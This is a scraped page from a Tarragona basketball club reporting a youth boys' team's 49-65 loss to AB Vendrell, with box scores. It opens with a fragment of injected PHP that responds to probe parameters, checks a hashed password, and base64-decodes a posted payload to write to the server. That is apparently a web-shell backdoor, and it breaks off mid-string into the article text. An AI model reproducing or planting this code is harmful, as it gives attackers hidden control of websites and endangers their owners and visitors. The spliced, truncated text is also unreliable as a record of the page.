function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Bon inici sense premi de l'infantil masculí B (49-65) - Tgn Bàsquet Club -

Bon inici sense premi de l’infantil masculí B (49-65)

Updated: novembre 24, 2013

L’equip infantil masculí B del TGN Bàsquet va perdre contra el Vendrell tot i fer un gran inici de partit. El conjunt local va sortir molt concentrat a la pista i, amb una gran defensa, va ofegar l’atac rival aconseguint un avantatge de 12 punts al minut 10 (19-7). El partit, però es va anar igualant fins que després del descans la bona defensa visitant va provocar moltes errades en el TGN Bàsquet que va encaixar molts punts en contraatac (parcial de 2-21). Tot i la lluita dels tarragonins, la diferència desfavorable era massa gran i la victòria va marxar cap El Vendrell.

TGN BASQUET B 49 –  AB VENDRELL  65
TGN BASQUET B: Casino (15), Virgili P. (4), Torija (2), Virgili j. (2), Rubio (3) – cinc inicial – Domínguez (2), Vidal (2), Puyuelo (15), Escalera (4) i Bladé. 25 faltes. 3 de 12 en tirs lliures.
AB VENDRELL: Medina, Solé (18), Garcia (4), Manchero (9), Trovve (6) – cinc inicial – Lammeridrof (5), Hormigo, Olive (7), Maldonado (16) y Gil . 17 faltes. 13 de 31 en tirs lliures.

Parcials: 9 – 4, 10 – 3, 4 – 5, 8 – 9, 2 – 10, 0 – 11, 7 – 14, 9 – 9.